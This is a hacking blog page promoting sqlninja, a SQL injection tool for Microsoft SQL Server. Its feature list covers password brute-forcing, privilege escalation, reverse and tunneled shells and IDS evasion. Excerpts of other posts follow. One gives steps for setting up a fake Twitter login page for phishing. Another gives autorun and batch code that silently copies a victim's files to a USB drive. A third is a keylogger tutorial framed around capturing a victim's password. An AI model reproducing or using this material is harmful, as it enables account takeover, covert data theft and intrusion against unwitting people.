Skip to main content

SQLNINJA: A Powerful Sql injection t00l!!

By

SQL NINJA:

Fancy going from a SQL Injection on Microsoft SQL Server to a full GUI access on the DB? Take a few new SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have just one of the attack modules of sqlninja!

Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.
Have a look at the flash demo and then feel free to download. It is released under the GPLv3

FEAUTRES:

The full documentation can be found in the tarball and also here, but here's a list of what the Ninja does:
Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)

Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)
Privilege escalation to sysadmin group if 'sa' password has been found
Creation of a custom xp_cmdshell if the original one has been removed
Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell

Direct and reverse bindshell, both TCP and UDP
ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box
DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
Evasion techniques to confuse a few IDS/IPS/WAF
Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection
Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping
Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM

FOR MAC & LINUX

Labels:

Comments

Post a Comment

Popular posts from this blog

How to Hack a Twitter Account

By
Twitter is one of the topmost widely running social networking sites,Its alexa ranking is 14(As per now).So therefore it is largely becoming target of hackers,Many requests keep coming to me ,please tell us a way to Hack twitter accounts or How to hack twitter accounts,so therefore i today i have written a post on How to hack twitter accounts Well for this purpose i will tell you the most used method to hack twitter accounts i.e phishing How to hack twitter accounts - Phishing First of all download:   Twitter fake login page ( Latest Version ) Click Here To Download : NOTE : You will be asked to enter a password while extracting the Documents. Please Insert the password as : IHA Step 1 First extract the contents into a folder Step 2 Then edit login.php .(right click and then select edit) In that ,find (CTRL+F) ‘http://rafayhackingarticles.blogspot.com’ then change it to your destined URL but don’t forget ‘'. Now rename the script to pass.php and save it
Post a Comment
Read more

How to steal data using your USB flash drive

By
Hello friends, In this tutorial we will revealed a new tweak which is illegal but sharing here for educational purpose. This post is only to demonstrate how a user can steal victim's data without any permission, as soon as the flash drive is attached to computer, the files starts to copy in flash drive without any notice. Process is very simple as we have to add only 4-5 notepad files in the flash drive. Follow the following steps :- 1. Create a notepad file with name autorun.inf nad copy the following code. [autorun] icon=drive.ico open=launch.bat action=Click OK to Run shell\open\command=launch.bat 2. Create another notepad file of name file.bat and copy the following code. @echo off :: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off %backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics” %backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites” %backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
Post a Comment
Read more

How to use Keyloggers – Detailed Tutorial and FAQs

By
Here is a DETAILED tutorial which contains every possible information that you need to know about keyloggers which includes how to use it, how it works etc. WARNING: I highly recommend that you read this post completely since every single piece of information is important. I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go… 1. What is a Keylogger? A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password. 2. How Keylogger works? Once the keylogger is installed on a PC, it starts operating in the backgrou
Post a Comment
Read more